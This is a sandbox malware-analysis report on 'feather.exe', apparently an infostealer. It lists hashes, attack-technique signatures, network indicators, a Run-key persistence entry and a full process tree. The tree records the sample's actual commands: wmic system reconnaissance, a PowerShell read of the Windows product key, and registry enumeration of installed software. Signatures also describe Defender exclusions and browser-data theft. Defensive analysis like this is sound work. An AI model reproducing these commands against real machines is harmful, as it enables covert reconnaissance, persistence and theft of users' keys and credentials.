Overview
overview
8Static
static
3feather.exe
windows7-x64
7feather.exe
windows10-2004-x64
7$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3LICENSES.c...m.html
windows7-x64
1LICENSES.c...m.html
windows10-2004-x64
1d3dcompiler_47.dll
windows10-2004-x64
1feather.exe
windows7-x64
1feather.exe
windows10-2004-x64
8ffmpeg.dll
windows7-x64
1ffmpeg.dll
windows10-2004-x64
1libEGL.dll
windows7-x64
1libEGL.dll
windows10-2004-x64
1libGLESv2.dll
windows7-x64
1libGLESv2.dll
windows10-2004-x64
1resources/elevate.exe
windows7-x64
1resources/elevate.exe
windows10-2004-x64
1vk_swiftshader.dll
windows7-x64
1vk_swiftshader.dll
windows10-2004-x64
1vulkan-1.dll
windows7-x64
1vulkan-1.dll
windows10-2004-x64
1$PLUGINSDI...7z.dll
windows7-x64
3$PLUGINSDI...7z.dll
windows10-2004-x64
3Analysis
-
max time kernel
843s -
max time network
454s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
11/06/2024, 17:49
Static task
static1
Behavioral task
behavioral1
Sample
feather.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
feather.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win7-20240508-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral7
Sample
LICENSES.chromium.html
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
LICENSES.chromium.html
Resource
win10v2004-20240508-en
Behavioral task
behavioral9
Sample
d3dcompiler_47.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral10
Sample
feather.exe
Resource
win7-20240508-en
Behavioral task
behavioral11
Sample
feather.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral12
Sample
ffmpeg.dll
Resource
win7-20240508-en
Behavioral task
behavioral13
Sample
ffmpeg.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral14
Sample
libEGL.dll
Resource
win7-20240220-en
Behavioral task
behavioral15
Sample
libEGL.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral16
Sample
libGLESv2.dll
Resource
win7-20240221-en
Behavioral task
behavioral17
Sample
libGLESv2.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral18
Sample
resources/elevate.exe
Resource
win7-20240221-en
Behavioral task
behavioral19
Sample
resources/elevate.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral20
Sample
vk_swiftshader.dll
Resource
win7-20240221-en
Behavioral task
behavioral21
Sample
vk_swiftshader.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral22
Sample
vulkan-1.dll
Resource
win7-20240221-en
Behavioral task
behavioral23
Sample
vulkan-1.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral24
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win7-20240508-en
Behavioral task
behavioral25
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win10v2004-20240426-en
General
-
Target
feather.exe
-
Size
164.7MB
-
MD5
a3397ce6bac790f14ca2aea580b93b0a
-
SHA1
cd632ac684d5fc87009c261313015ba31a5a7f16
-
SHA256
eee88f50670a3491925a51e8f8765edc339ec025488a083245759d0181969c7c
-
SHA512
ea74218fd6fa5c832cbeb1e99e562996f16e11f3b8b1adbb7714a21988312a26d3c02d581375bc904f7d808decc9413c48ceba156e3b51817aad67c2e83e6995
-
SSDEEP
1572864:a3lB0RhDP7igv6wO+HkaN/xtpj56BZWua2T3jC0gqhd07YeRt6C1Bd1jKoUeKtQk:vPvt1x2z5m1ij
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2552 powershell.exe 2296 powershell.exe 3312 powershell.exe 4828 powershell.exe 1284 powershell.exe 496 powershell.exe 4704 powershell.exe 4644 powershell.exe -
Disables Task Manager via registry modification
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation feather.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\feather.exe feather.exe -
Executes dropped EXE 2 IoCs
pid Process 4876 GooseDesktop.exe 3792 GooseDesktop.exe -
Loads dropped DLL 7 IoCs
pid Process 1804 feather.exe 1804 feather.exe 1804 feather.exe 4876 GooseDesktop.exe 4876 GooseDesktop.exe 3792 GooseDesktop.exe 3792 GooseDesktop.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupqfB3Eu = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\feather.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs
flow ioc 28 raw.githubusercontent.com 35 raw.githubusercontent.com 60 raw.githubusercontent.com 75 raw.githubusercontent.com 26 raw.githubusercontent.com 62 raw.githubusercontent.com 31 raw.githubusercontent.com 74 raw.githubusercontent.com 30 raw.githubusercontent.com 29 raw.githubusercontent.com 32 raw.githubusercontent.com 63 raw.githubusercontent.com 67 raw.githubusercontent.com 76 raw.githubusercontent.com 27 raw.githubusercontent.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 ipinfo.io 24 ipinfo.io -
Drops file in System32 directory 11 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs svchost.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz feather.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString feather.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 feather.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 feather.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz feather.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString feather.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 feather.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2232 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3324 WMIC.exe -
Kills process with taskkill 2 IoCs
pid Process 1344 taskkill.exe 4332 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings mspaint.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings mspaint.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4968 notepad.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 3232 powershell.exe 3232 powershell.exe 3736 powershell.exe 3736 powershell.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe 1804 feather.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4876 GooseDesktop.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1804 feather.exe Token: SeCreatePagefilePrivilege 1804 feather.exe Token: SeIncreaseQuotaPrivilege 3660 WMIC.exe Token: SeSecurityPrivilege 3660 WMIC.exe Token: SeTakeOwnershipPrivilege 3660 WMIC.exe Token: SeLoadDriverPrivilege 3660 WMIC.exe Token: SeSystemProfilePrivilege 3660 WMIC.exe Token: SeSystemtimePrivilege 3660 WMIC.exe Token: SeProfSingleProcessPrivilege 3660 WMIC.exe Token: SeIncBasePriorityPrivilege 3660 WMIC.exe Token: SeCreatePagefilePrivilege 3660 WMIC.exe Token: SeBackupPrivilege 3660 WMIC.exe Token: SeRestorePrivilege 3660 WMIC.exe Token: SeShutdownPrivilege 3660 WMIC.exe Token: SeDebugPrivilege 3660 WMIC.exe Token: SeSystemEnvironmentPrivilege 3660 WMIC.exe Token: SeRemoteShutdownPrivilege 3660 WMIC.exe Token: SeUndockPrivilege 3660 WMIC.exe Token: SeManageVolumePrivilege 3660 WMIC.exe Token: 33 3660 WMIC.exe Token: 34 3660 WMIC.exe Token: 35 3660 WMIC.exe Token: 36 3660 WMIC.exe Token: SeIncreaseQuotaPrivilege 3660 WMIC.exe Token: SeSecurityPrivilege 3660 WMIC.exe Token: SeTakeOwnershipPrivilege 3660 WMIC.exe Token: SeLoadDriverPrivilege 3660 WMIC.exe Token: SeSystemProfilePrivilege 3660 WMIC.exe Token: SeSystemtimePrivilege 3660 WMIC.exe Token: SeProfSingleProcessPrivilege 3660 WMIC.exe Token: SeIncBasePriorityPrivilege 3660 WMIC.exe Token: SeCreatePagefilePrivilege 3660 WMIC.exe Token: SeBackupPrivilege 3660 WMIC.exe Token: SeRestorePrivilege 3660 WMIC.exe Token: SeShutdownPrivilege 3660 WMIC.exe Token: SeDebugPrivilege 3660 WMIC.exe Token: SeSystemEnvironmentPrivilege 3660 WMIC.exe Token: SeRemoteShutdownPrivilege 3660 WMIC.exe Token: SeUndockPrivilege 3660 WMIC.exe Token: SeManageVolumePrivilege 3660 WMIC.exe Token: 33 3660 WMIC.exe Token: 34 3660 WMIC.exe Token: 35 3660 WMIC.exe Token: 36 3660 WMIC.exe Token: SeIncreaseQuotaPrivilege 2232 WMIC.exe Token: SeSecurityPrivilege 2232 WMIC.exe Token: SeTakeOwnershipPrivilege 2232 WMIC.exe Token: SeLoadDriverPrivilege 2232 WMIC.exe Token: SeSystemProfilePrivilege 2232 WMIC.exe Token: SeSystemtimePrivilege 2232 WMIC.exe Token: SeProfSingleProcessPrivilege 2232 WMIC.exe Token: SeIncBasePriorityPrivilege 2232 WMIC.exe Token: SeCreatePagefilePrivilege 2232 WMIC.exe Token: SeBackupPrivilege 2232 WMIC.exe Token: SeRestorePrivilege 2232 WMIC.exe Token: SeShutdownPrivilege 2232 WMIC.exe Token: SeDebugPrivilege 2232 WMIC.exe Token: SeSystemEnvironmentPrivilege 2232 WMIC.exe Token: SeRemoteShutdownPrivilege 2232 WMIC.exe Token: SeUndockPrivilege 2232 WMIC.exe Token: SeManageVolumePrivilege 2232 WMIC.exe Token: 33 2232 WMIC.exe Token: 34 2232 WMIC.exe Token: 35 2232 WMIC.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1804 feather.exe 4876 GooseDesktop.exe 4876 GooseDesktop.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2560 mspaint.exe 1292 OpenWith.exe 3760 mspaint.exe 1344 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1804 wrote to memory of 4784 1804 feather.exe 84 PID 1804 wrote to memory of 4784 1804 feather.exe 84 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1632 1804 feather.exe 86 PID 1804 wrote to memory of 1316 1804 feather.exe 87 PID 1804 wrote to memory of 1316 1804 feather.exe 87 PID 4784 wrote to memory of 3660 4784 cmd.exe 88 PID 4784 wrote to memory of 3660 4784 cmd.exe 88 PID 1804 wrote to memory of 1676 1804 feather.exe 89 PID 1804 wrote to memory of 1676 1804 feather.exe 89 PID 1804 wrote to memory of 4340 1804 feather.exe 91 PID 1804 wrote to memory of 4340 1804 feather.exe 91 PID 1804 wrote to memory of 5084 1804 feather.exe 92 PID 1804 wrote to memory of 5084 1804 feather.exe 92 PID 1676 wrote to memory of 1608 1676 cmd.exe 95 PID 1676 wrote to memory of 1608 1676 cmd.exe 95 PID 5084 wrote to memory of 2232 5084 cmd.exe 96 PID 5084 wrote to memory of 2232 5084 cmd.exe 96 PID 5084 wrote to memory of 2352 5084 cmd.exe 97 PID 5084 wrote to memory of 2352 5084 cmd.exe 97 PID 4340 wrote to memory of 4372 4340 cmd.exe 99 PID 4340 wrote to memory of 4372 4340 cmd.exe 99 PID 1608 wrote to memory of 2148 1608 net.exe 98 PID 1608 wrote to memory of 2148 1608 net.exe 98 PID 1804 wrote to memory of 4336 1804 feather.exe 100 PID 1804 wrote to memory of 4336 1804 feather.exe 100 PID 4336 wrote to memory of 3352 4336 cmd.exe 102 PID 4336 wrote to memory of 3352 4336 cmd.exe 102 PID 4336 wrote to memory of 1624 4336 cmd.exe 103 PID 4336 wrote to memory of 1624 4336 cmd.exe 103 PID 1804 wrote to memory of 4200 1804 feather.exe 104 PID 1804 wrote to memory of 4200 1804 feather.exe 104 PID 4200 wrote to memory of 3324 4200 cmd.exe 106 PID 4200 wrote to memory of 3324 4200 cmd.exe 106 PID 4200 wrote to memory of 2556 4200 cmd.exe 107 PID 4200 wrote to memory of 2556 4200 cmd.exe 107 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2964 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\feather.exe"C:\Users\Admin\AppData\Local\Temp\feather.exe"1⤵
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1804 get ExecutablePath"2⤵
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\System32\Wbem\WMIC.exewmic process where processid=1804 get ExecutablePath3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3660
-
-
-
C:\Users\Admin\AppData\Local\Temp\feather.exe"C:\Users\Admin\AppData\Local\Temp\feather.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1968 --field-trial-handle=1972,i,13653388541210594517,12772611045315979887,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:22⤵PID:1632
-
-
C:\Users\Admin\AppData\Local\Temp\feather.exe"C:\Users\Admin\AppData\Local\Temp\feather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --mojo-platform-channel-handle=2044 --field-trial-handle=1972,i,13653388541210594517,12772611045315979887,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:82⤵PID:1316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "net session"2⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:2148
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"2⤵
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:4372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"2⤵
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\System32\Wbem\WMIC.exewmic OS get caption, osarchitecture3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\system32\more.commore +13⤵PID:2352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"2⤵
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name3⤵PID:3352
-
-
C:\Windows\system32\more.commore +13⤵PID:1624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"2⤵
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController get name3⤵
- Detects videocard installed
PID:3324
-
-
C:\Windows\system32\more.commore +13⤵PID:2556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"2⤵PID:2924
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"2⤵PID:2484
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1804 get ExecutablePath"2⤵PID:1952
-
C:\Windows\System32\Wbem\WMIC.exewmic process where processid=1804 get ExecutablePath3⤵PID:4472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""2⤵PID:3988
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"3⤵PID:2660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""2⤵PID:2052
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"3⤵PID:2544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""2⤵PID:3436
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"3⤵PID:1484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""2⤵PID:2216
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"3⤵PID:4424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""2⤵PID:864
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"3⤵PID:4872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""2⤵PID:4876
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"3⤵PID:4912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""2⤵PID:4904
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"3⤵PID:1608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""2⤵PID:4920
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"3⤵PID:3856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""2⤵PID:4176
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"3⤵PID:4360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""2⤵PID:5012
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"3⤵PID:4344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""2⤵PID:2700
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"3⤵PID:496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""2⤵PID:3752
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"3⤵PID:4760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""2⤵PID:3476
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"3⤵PID:4880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)""2⤵PID:2524
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"3⤵PID:3048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""2⤵PID:3432
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"3⤵PID:4116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""2⤵PID:744
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"3⤵PID:1988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""2⤵PID:4988
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"3⤵PID:1956
-
-
-
